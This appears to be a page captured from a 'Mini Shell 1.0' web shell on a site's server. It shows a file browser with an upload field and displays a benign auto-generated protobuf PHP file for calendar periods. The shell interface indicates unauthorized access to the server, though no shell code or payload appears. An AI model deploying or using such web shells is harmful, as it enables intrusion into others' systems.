HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /var/www/devs.lapieza.net/vendor/google/common-protos/metadata/Type/
Upload File :
Current File : /var/www/devs.lapieza.net/vendor/google/common-protos/metadata/Type/CalendarPeriod.php
<?php
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# source: google/type/calendar_period.proto

namespace GPBMetadata\Google\Type;

class CalendarPeriod
{
    public static $is_initialized = false;

    public static function initOnce() {
        $pool = \Google\Protobuf\Internal\DescriptorPool::getGeneratedPool();

        if (static::$is_initialized == true) {
          return;
        }
        $pool->internalAddGeneratedFile(
            '
�
!google/type/calendar_period.protogoogle.type*
CalendarPeriod
CALENDAR_PERIOD_UNSPECIFIED
DAY
WEEK
	FORTNIGHT	
MONTH
QUARTER
HALF
YEARBx
com.google.typeBCalendarPeriodProtoPZHgoogle.golang.org/genproto/googleapis/type/calendarperiod;calendarperiod�GTPbproto3'
        , true);

        static::$is_initialized = true;
    }
}